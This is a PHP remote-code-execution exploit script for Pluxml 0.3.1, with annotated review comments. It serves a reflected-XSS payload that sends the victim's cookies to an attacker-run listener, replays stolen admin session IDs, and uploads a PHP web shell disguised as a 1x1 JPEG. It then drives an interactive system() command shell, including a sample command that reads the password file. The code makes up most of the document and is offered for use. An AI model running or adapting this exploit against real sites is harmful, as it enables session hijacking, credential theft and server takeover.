<?php
#
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
# Note: The new version is compatible with PHP 4 by default.
##############################################################
# Report everything except E_NOTICE (undefined-index notices are expected in
# this script, e.g. getparam() indexing past the end of $argv).
error_reporting(E_ALL & ~E_NOTICE);
# HTTP client wrapper; this script uses its agent(), addheader(), get(),
# getheader(), formdata() and getcontent() methods.
require 'phpsploitclass.php';
# C:\> sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196
# [/]Waiting for connection on http://90.27.10.196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 182.26.54.2:2007
# [+]Sending 366 bytes to 182.26.54.2:2007
# [+]Received 326 bytes from 182.26.54.2:2009
# [+]Sending 366 bytes to 182.26.54.2:2009
# [+]Received 692 bytes from 182.26.54.2:2010
# [!]Received one cookie from 182.26.54.2:2010
# [/]Verifying if there is a valid session id cookie
# [-]No: pollvote=1
# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b
# [+]The created socket has been shut down
# $shell> whoami
# darkfig
#
# Usage banner. At least "-url <x> -ip <y>" is required, which with the
# script name itself gives argc >= 5; anything shorter prints the help text
# and exits with status 1. Only the argument count is checked here -- the
# actual flags are looked up (and mandatory ones enforced) by getparam().
if($argc < 5)
{
print("
------------ Pluxml 0.3.1 Remote Code Execution Exploit -------------
---------------------------------------------------------------------
Credits: DarkFig <[email protected]>
URL: acid-root.new.fr || mgsdl.free.fr
IRC: #[email protected]
Note: Coded for fun 8)
---------------------------------------------------------------------
Usage: $argv[0] -url <> -ip <> [Options]
Params: -url For example http://victim.com/pluxml0.3.1/
-ip The IP that will be bound to the socket
Options: -port The socket will listen on this port (default=80)
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
---------------------------------------------------------------------
");exit(1);
}
# PhpSploit object
####################
# HTTP client used for every request sent to the target; the User-Agent is
# set once here and reused for all of them.
$xpl = new phpsploit();
$xpl->agent('Firefox');
# Server
##########
# Where the attacker-side listener binds. -ip is mandatory, -port defaults
# to 80. $server_url is both what the listener prints and the address the
# injected script redirects the victim's browser to.
$server_addr = getparam('ip',1);
$server_port = (getparam('port')!='') ? getparam('port') : '80';
$server_url = "http://$server_addr:$server_port/";
# Victim
##########
# Base URL of the Pluxml install (mandatory). It must end with '/' because
# paths such as 'pluxml/admin/auth.php' are appended to it verbatim.
$hack = getparam('url',1);
# Decoy page body shown to whoever opens the lure link.
$html = "<h1>hello :)</h1>\n";
# Apparently my XSS bypass NoScript protection
################################################
# Cookie-theft payload: a 0x0 iframe pointing at the target's own
# admin/auth.php with a script injected through the 'msg' parameter. The
# script sends the browser to "$server_url?c=" + document.cookie, so the
# victim's cookies for the target origin (including the admin PHPSESSID, see
# the sample session at the top of the file) reach the listener in the
# request line. char() spells the listener URL as String.fromCharCode(...)
# so the payload contains no quote characters and survives magic_quotes_gpc
# on the target.
# NOTE(review): this relies on auth.php echoing 'msg' unescaped (reflected
# XSS) -- inferred from the exploit, not shown in this file. The author's
# claim that it gets past NoScript is unverified. "${hack}" interpolation is
# deprecated since PHP 8.2; "{$hack}" is the equivalent.
$xss = "<iframe src='${hack}pluxml/admin/auth.php?msg="
."<script>document.location=(".char($server_url.'?c=')
.".concat(document.cookie))</script>'"
." height=0 width=0>";
# Socket
##########
# Plain TCP listener that plays the part of a minimal HTTP server on
# -ip:-port. None of the return values are checked: if bind() fails (on most
# systems port 80 needs root/administrator rights, or the port may be in
# use) the failure only shows up when socket_accept() returns FALSE and the
# main loop exit(1)s. The listener is unauthenticated: anyone who can reach
# it gets the payload page, and anything sent with "?c=" is treated as a
# stolen cookie and replayed against the target.
$handle = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_bind($handle, $server_addr, $server_port);
socket_listen($handle);
print "\n[/]Waiting for connection on $server_url";
print "\n[!]Now you have to make the victim to click on the url";
# Wait until we get admin rights
##################################
# Main listener loop. Each accepted connection is handled as one HTTP request:
#  - a request without "?c=" (the victim following the lure link) is answered
#    with the decoy page plus the hidden iframe payload;
#  - a request carrying "?c=<cookies>" is the callback from the injected
#    script: every "name=value" pair is replayed against the target's admin
#    page and the first one that is accepted hands off to code_execution(),
#    which never returns (it exit()s). No response is written to the
#    callback request itself.
while(TRUE)
{
$packet = '';
# socket_accept() returning FALSE is also how an unchecked bind/listen
# failure above surfaces.
if(!$msg = socket_accept($handle))
exit(1);
# End of the packet ?
######################
# Read until the blank line that terminates the request headers.
# NOTE(review): if the peer closes the connection before sending "\r\n\r\n",
# socket_read() returns '' or FALSE from then on and this loop never exits.
# ereg() was removed in PHP 7; preg_match("/\r\n\r\n/", $packet) or
# strpos($packet, "\r\n\r\n") !== false is the equivalent.
while(!ereg("\r\n\r\n",$packet))
$packet .= socket_read($msg, 2048, PHP_BINARY_READ);
socket_getpeername($msg, $clientaddr, $clientport);
print "\n[+]Received ".strlen($packet)." bytes from $clientaddr:$clientport";
# Server response
##################
# Response for the lure request. The status line is not a valid HTTP status
# line ("HTTP/1.1 200 OK" would be) and Transfer-Encoding: chunked is
# declared although the body is not chunk-encoded; the sample session
# suggests the author's browser rendered it anyway.
$serv =
"HTTP 1.x 200 OK\r\n"
."Connection: close\r\n"
."Transfer-Encoding: chunked\r\n"
."Content-Type: text/html\r\n\r\n"
.$html.$xss."\r\n\r\n";
# Is there a cookie ?
#######################
# Matches the request line "GET /?c=<cookies> HTTP/1.x". document.location
# URL-encodes the "; " separator of document.cookie, hence the ';%20' split.
if(preg_match("#\?c=(\S*) HTTP/1\.([01x]+)#", $packet, $cookies))
{
print "\n[!]Received one cookie from $clientaddr:$clientport";
print "\n[/]Verifying if there is a valid session id cookie";
$cookie = explode(';%20',$cookies[1]);
foreach($cookie as $session)
{
# Valid session id ?
#######################
# is_valid_session() sets the Cookie header on $xpl and leaves it there,
# which is what code_execution() relies on for the authenticated upload.
if(is_valid_session($session))
# Let's upload a file
#######################
# Never returns: code_execution() closes $msg and exit()s.
code_execution();
}
print "\n[-]No valid session id cookie found";
print "\n[/]Always waiting for connection";
}
# Answer to the client
########################
else
{
print "\n[+]Sending ".strlen($serv)." bytes to $clientaddr:$clientport";
socket_write($msg, $serv, strlen($serv));
}
socket_close($msg);
}
# Function which is like getopt()
###################################
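# Minimal getopt() replacement: returns the argv entry that follows "-<param>".
# $param  option name without the leading dash (e.g. 'url' for "-url").
# $opt    truthy when the option is mandatory; a missing mandatory option
#         aborts the script. Note that exit(string) prints the message on
#         stdout and exits with status 0, not an error status.
# Returns the option's value, or NULL when an optional option is absent.
# A flag given as the last argument has no value: the original indexed past
# the end of $argv and silently returned NULL; it is now treated exactly like
# a missing option (NULL when optional, abort when mandatory).
function getparam($param,$opt='')
{
    global $argv;
    $flag = '-'.$param;
    foreach($argv as $index => $arg)
    {
        if($arg !== $flag)
            continue;
        if(isset($argv[$index+1]))
            return $argv[$index+1];
        break;
    }
    if($opt)
        exit("-$param parameter required");
    return;
}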
# Bypass magic_quotes_gpc
###########################
# Encode $data as a JavaScript String.fromCharCode(...) expression.
# The result contains only digits, commas and parentheses -- no quotes -- so
# a string built this way survives magic_quotes_gpc escaping on the target
# and can sit inside an attribute that is already quoted.
# $data  raw byte string (e.g. the listener URL).
# Returns e.g. 'String.fromCharCode(104,105)' for "hi"; an empty input yields
# 'String.fromCharCode()'.
function char($data)
{
    $codes = array();
    $length = strlen($data);
    for($i = 0; $i < $length; $i++)
        $codes[] = ord($data[$i]);
    return 'String.fromCharCode(' . implode(',', $codes) . ')';
}
# Admin session always available ?
###################################
# Admin session always available ?
###################################
# Replays one stolen cookie ("name=value") against the admin index page and
# reports whether the target still honours it as a logged-in session.
# $session  a single cookie pair, sent verbatim as the Cookie header.
# Returns FALSE when the target redirects to auth.php (the login page),
# TRUE otherwise.
# NOTE(review): "otherwise" includes any non-redirect error -- a 404 because
# -url was wrong, a 500, a moved install -- so those are reported as a valid
# session and trigger code_execution(). Checking for a 200 status plus a
# marker of the admin page would be stricter.
# eregi() was removed in PHP 7; preg_match('/Location: auth.php/i', ...) is
# the equivalent.
function is_valid_session($session)
{
global $xpl,$hack;
# Presumably addheader() replaces an existing Cookie header rather than
# appending one -- TODO confirm in phpsploitclass.php; otherwise cookies from
# earlier iterations accumulate on the same request. The header is left in
# place on $xpl, which code_execution() depends on.
$xpl->addheader('Cookie',$session);
$xpl->get($hack.'pluxml/admin/index.php');
if(eregi('Location: auth.php', $xpl->getheader()))
{
print "\n[-]No: $session";
return FALSE;
}
else
{
print "\n[!]Yes: $session";
return TRUE;
}
}
# File upload vulnerability
#############################
# File upload vulnerability
#############################
# Uploads a PHP-in-JPEG web shell through the admin image uploader, then runs
# an interactive command loop against it. Called from the listener loop once
# is_valid_session() has left an accepted admin Cookie header on $xpl; this
# function sets no cookie of its own. Never returns: exit(0) at the end.
# Reads the globals $xpl (HTTP client), $hack (target base URL) and $msg (the
# accepted client socket from the main loop, closed here; the listening
# socket $handle is left to be closed at process exit).
function code_execution()
{
global $xpl,$hack,$msg;
socket_close($msg);
print "\n[+]The created socket has been shut down";
# +images.php [File Upload Vulnerability]
# |
# The vulnerable handler as quoted by the author. The only check is
# getimagesize() on the temporary file (line 14); the stored name is
# basename() of the client-supplied filename with no extension whitelist
# (line 13), and the result is made world-writable (line 16). A file that
# parses as an image but carries a .php name is therefore written under
# images/ where the web server executes it.
# 11. if(!empty($_FILES)){
# 12. $uploaddir = '../../images/';
# 13. $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
# 14. if(getimagesize($_FILES['userfile']['tmp_name'])){
# 15. move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile);
# 16. chmod($uploadfile, 0777);
# 17. $msg = 'Image envoyée';            (French: "Image sent")
# 18. }else{
# 19. $msg = 'Le fichier n\'est pas une image';   (French: "The file is not an image")
# 20. }
# 21. header('Location: images.php?msg='.$msg);
# 22. }
#
# Fake JPG 1x1
# A valid 1x1 JPEG whose PHP payload sits inside a COM (comment) segment:
# the bytes FF FE 00 7F at offset 0xA0 below open a 127-byte comment that
# getimagesize() skips, while the PHP interpreter still finds and executes
# the "<?php ... ?>" inside it. The payload evals the request header
# "Shell:" (available as $_SERVER['HTTP_SHELL']) and brackets the output
# with "print 123456789101112;" so the client can cut it out.
# 000000A0 007F 3C3F 7068 700D 0A69 6628 6973 7365 ..<?php..if(isse
# 000000B0 7428 245F 5345 5256 4552 5B48 5454 505F t($_SERVER[HTTP_
# 000000C0 5348 454C 4C5D 2929 0D0A 7B0D 0A70 7269 SHELL]))..{..pri
# 000000D0 6E74 2031 3233 3435 3637 3839 3130 3131 nt 1234567891011
# 000000E0 3132 3B0D 0A65 7661 6C28 245F 5345 5256 12;..eval($_SERV
# 000000F0 4552 5B48 5454 505F 5348 454C 4C5D 293B ER[HTTP_SHELL]);
# 00000100 0D0A 7072 696E 7420 3132 3334 3536 3738 ..print 12345678
# 00000110 3931 3031 3131 323B 0D0A 7D0D 0A3F 3EFF 9101112;..}..?\>.
#
$fakejpg =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00"
."\x60\x00\x60\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06"
."\x05\x08\x07\x07\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B"
."\x0C\x19\x12\x13\x0F\x14\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20"
."\x24\x2E\x27\x20\x22\x2C\x23\x1C\x1C\x28\x37\x29\x2C\x30\x31"
."\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C\x2E\x33\x34\x32\xFF"
."\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D\x0D\x18\x32"
."\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\xFF\xFE\x00\x7F\x3C\x3F\x70"
."\x68\x70\x0D\x0A\x69\x66\x28\x69\x73\x73\x65\x74\x28\x24\x5F"
."\x53\x45\x52\x56\x45\x52\x5B\x48\x54\x54\x50\x5F\x53\x48\x45"
."\x4C\x4C\x5D\x29\x29\x0D\x0A\x7B\x0D\x0A\x70\x72\x69\x6E\x74"
."\x20\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31"
."\x32\x3B\x0D\x0A\x65\x76\x61\x6C\x28\x24\x5F\x53\x45\x52\x56"
."\x45\x52\x5B\x48\x54\x54\x50\x5F\x53\x48\x45\x4C\x4C\x5D\x29"
."\x3B\x0D\x0A\x70\x72\x69\x6E\x74\x20\x31\x32\x33\x34\x35\x36"
."\x37\x38\x39\x31\x30\x31\x31\x31\x32\x3B\x0D\x0A\x7D\x0D\x0A"
."\x3F\x3E\xFF\xC0\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00"
."\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01"
."\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02"
."\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00"
."\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D"
."\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51\x61"
."\x07\x22\x71\x14\x32\x81\x91\xA1\x08\x23\x42\xB1\xC1\x15\x52"
."\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19\x1A\x25"
."\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45"
."\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64"
."\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83"
."\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99"
."\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6"
."\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3"
."\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8"
."\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xC4\x00"
."\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00"
."\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B"
."\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05"
."\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31"
."\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91"
."\xA1\xB1\xC1\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24"
."\x34\xE1\x25\xF1\x17\x18\x19\x1A\x26\x27\x28\x29\x2A\x35\x36"
."\x37\x38\x39\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55"
."\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74"
."\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A"
."\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7"
."\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4"
."\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA"
."\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7"
."\xF8\xF9\xFA\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
."\x3F\x00\xF7\xFA\x28\xA2\x80\x3F\xFF\xD9";
# Multipart POST to the uploader. The filename is what ends up on disk
# (see line 13 above), so 'iwashere.php' lands at ../../images/iwashere.php
# relative to the admin script -- i.e. $hack.'images/iwashere.php' below.
# frmdt_url / frmdt_filename / frmdt_content are presumably constants
# defined by phpsploitclass.php -- TODO confirm.
$formdata = array(
frmdt_url => $hack.'pluxml/admin/images.php',
'userfile' => array(
frmdt_filename => 'iwashere.php',
frmdt_content => $fakejpg));
$xpl->formdata($formdata);
print "\n\$shell> ";
# Interactive loop: each line typed is wrapped as system('<line>') and sent
# in the "Shell" request header, which the uploaded file passes to eval().
# 'quit' or 'exit' ends the session (and the script).
while(!preg_match('#^(quit|exit)$#', ($cmd = trim(fgets(STDIN)))))
{
# $shell> cat ../pluxml/conf/password.xml
########################################
# $cmd is dropped into single quotes without escaping: a quote in the
# command breaks the injected PHP instead of running it.
$xpl->addheader('Shell',"system('$cmd');");
$xpl->get($hack.'images/iwashere.php');
# The shell output sits between the two "print 123456789101112;" markers.
# NOTE(review): the delimiter matched here is the float form of that
# literal with a three-digit exponent, i.e. it assumes the target runs a
# 32-bit PHP (the literal overflows PHP_INT_MAX) on Windows (three-digit
# exponent formatting). On other targets the markers print differently,
# explode() finds no separator, and $content[1] is unset -- the shell then
# shows nothing even though the command ran.
$content = explode('1.23456789101E+014',$xpl->getcontent());
print $content[1]."\n\$shell> ";
}
exit(0);
}
?>